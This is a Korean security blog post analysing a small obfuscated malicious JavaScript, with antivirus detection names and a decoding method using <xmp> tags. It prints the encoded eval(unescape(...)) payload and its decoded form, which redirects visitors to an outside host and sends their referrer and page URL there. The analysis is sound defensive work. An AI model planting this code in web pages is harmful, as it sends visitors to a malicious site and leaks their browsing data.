티스토리 뷰
아래와 같은 악성 스크립트가 있다.
AV 업체들의 진단은 아래와 같다.
파일 자체가 실행되는 것은 아니고, 다른 스크립트에서 함수 s 만 호출하는 것으로 생각된다.
이 스크립트의 내용을 확인하기 위해서는 'function s(rt)' 부분을 제외하고
eval( 과 unescape("~") 사이에 "<xmp>"+ 를 넣고 끝에 </xmp> 추가
이렇게 파싱해주면 원본 메시지가 나타난다.
[ 파싱을 위해 <xmp> 를 추가한 인코딩 데이터 ]
[ 원본 메시지 ]
<xmp> 이외에도 <textarea> 도 가능하다고 들었는데, 다음에는 이것을 시도를 해봐야겠다.
function s(rt)
{
eval(unescape("uj%3Ddocument%3Bt%3D0%3Bvar1%3D5423%3Bvar2%3Dvar1%3Bv%3D%27mm.cn%27%3Bif%28var1%3D%3Dvar2%29document.location%3D%27http%3A%2F%2F491%27%2Bv%2B%27%2Fst%2F%3Fds%3D%27%2Brt%2B%27%26tm%3D%27%2Bt%2B%27%26pe%3D%27%2Bescape%28uj.referrer%29%2B%27%26oi%3D%27%2Bescape%28window.location.href%29%3B"));
}
{
eval(unescape("uj%3Ddocument%3Bt%3D0%3Bvar1%3D5423%3Bvar2%3Dvar1%3Bv%3D%27mm.cn%27%3Bif%28var1%3D%3Dvar2%29document.location%3D%27http%3A%2F%2F491%27%2Bv%2B%27%2Fst%2F%3Fds%3D%27%2Brt%2B%27%26tm%3D%27%2Bt%2B%27%26pe%3D%27%2Bescape%28uj.referrer%29%2B%27%26oi%3D%27%2Bescape%28window.location.href%29%3B"));
}
AV 업체들의 진단은 아래와 같다.
Comodo Exploit.JS.Redirect.~N
Authentium JS/Linker.BH
ViRobot Spyware.JS.Small.Do.322
Symantec Trojan.Malscript!html
Antiy-AVL Trojan/JS.Small
Ikarus Trojan-Downloader.JS.Small
a-squared Trojan-Downloader.JS.Small!IK
F-Secure Trojan-Downloader.JS.Small.oa
Kaspersky Trojan-Downloader.JS.Small.oa
Authentium JS/Linker.BH
ViRobot Spyware.JS.Small.Do.322
Symantec Trojan.Malscript!html
Antiy-AVL Trojan/JS.Small
Ikarus Trojan-Downloader.JS.Small
a-squared Trojan-Downloader.JS.Small!IK
F-Secure Trojan-Downloader.JS.Small.oa
Kaspersky Trojan-Downloader.JS.Small.oa
파일 자체가 실행되는 것은 아니고, 다른 스크립트에서 함수 s 만 호출하는 것으로 생각된다.
이 스크립트의 내용을 확인하기 위해서는 'function s(rt)' 부분을 제외하고
eval( 과 unescape("~") 사이에 "<xmp>"+ 를 넣고 끝에 </xmp> 추가
이렇게 파싱해주면 원본 메시지가 나타난다.
[ 파싱을 위해 <xmp> 를 추가한 인코딩 데이터 ]
eval("<xmp>"+unescape("uj%3Ddocument%3Bt%3D0%3Bvar1%3D5423%3Bvar2%3Dvar1%3Bv%3D%27mm.cn%27%3Bif%28var1%3D%3Dvar2%29document.location%3D%27http%3A%2F%2F491%27%2Bv%2B%27%2Fst%2F%3Fds%3D%27%2Brt%2B%27%26tm%3D%27%2Bt%2B%27%26pe%3D%27%2Bescape%28uj.referrer%29%2B%27%26oi%3D%27%2Bescape%28window.location.href%29%3B")+"</xmp>");
[ 원본 메시지 ]
function s(rt)
{
{
uj=document;
t=0;
var1=5423;
var2=var1;
v='mm.cn';
if(var1==var2)
document.location='http://491'+v+'/st/?ds='+rt+'&tm='+t+'&pe='+escape(uj.referrer)+'&oi='+escape(window.location.href);
}
<xmp> 이외에도 <textarea> 도 가능하다고 들었는데, 다음에는 이것을 시도를 해봐야겠다.
'보안 > 악성코드' 카테고리의 다른 글
_tpiu000.exe - IBM ThinkPad 구성 모듈 (0) | 2009.07.21 |
---|---|
OSE.EXE (0) | 2009.06.24 |
'스크립트 키드(script kids)'들을 골탕먹이는 악성 프로그램 ㅋ (1) | 2009.06.08 |
PS3에서 가짜 백신(Fake AV)의 설치 ;; (0) | 2009.06.08 |
액티브포스트 G-Suite : http://www.activepost.co.kr/ (0) | 2009.04.16 |
공지사항
최근에 올라온 글
최근에 달린 댓글
- Total
- Today
- Yesterday
링크
- 지루박멸연구센타
- 열정의 힘을 믿는다
- Le4rN TO Cr4cK
- 디버깅에관한모든것(DebugLab)
- sysinternals
- FoundStone
- hashtab
- 보안-coderant
- 디바이스드라이버 개발자 포럼
- dualpage.muz.ro
- osronline.com - 드라이버 관련 정보 사이트
- NtInternals - NativeAPI Refere…
- pcthreat - spyware 정보 제공
- rootkit.com - 루트킷 관련 정보
- www.ntinternals.net
- WINE CrossRef. - source.winehq…
- tuts4you
- hex-rays
- idapalace
- idefense
- immunityinc
- threatexpert
- hdp.null2root.org
- www.crackstore.com
- crackmes.de
- www.who.is
- www.cracklab.ru
- community.reverse-engineering.…
- video.reverse-engineering.net
- SnD
- 클레이 키위
- reversengineering.wordpress.co…
- www.openrce.org
- www.woodmann.com
- PEID.Plusins.BobSoft
- roxik.com/pictaps/
- regexlib.com
- spyware-browser.com
- www.usboffice.kr
- regulator
- www.txt2re.com
- ietab.mozdev.org
- zesrever.xstone.org
- www.heaventools.com/PE-file-he…
- www.heaventools.com
- www.innomp3.com
- 울지않는벌새
- exetools.com-forum
- exetools.com
- utf8 conv
- robtex - IP trace
- onsamehost - same IP sites
- JpopSuki
- jsunpack.jeek.org
- wepawet.iseclab.org
- www.jswiff.com
- www.hackeroo.com
- winesearcher.co.kr
- khpga.org
- malwareurl.com
- anubis.iseclab.org
- www.crummy.com-eautifulSoup
- malwarebytes.org/forums
- bbs.janmeng.com
- blackip.ustc.edu.cn
- eureka.cyber-ta.org
- exploit-db.com
TAG
- 피봇
- 군함도
- 주식트래이딩
- O365
- 레고랜드
- CriticalSection
- 맥쿼리인프라
- ROA
- ElasticSearch
- 공공인프라
- 실시간트래이딩
- 전세매매지수
- 자동트래이딩
- logrotate
- 주식
- PIR
- 매매가격지수
- 사회간접자본
- ubuntu
- SBI저축은행
- hai
- 시스템트래이딩
- ChatGPT
- 다올저축은행
- Pivot
- INVOICE
- 주택구매력지수
- 신한저축은행
- systemd
- 미국주식
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
글 보관함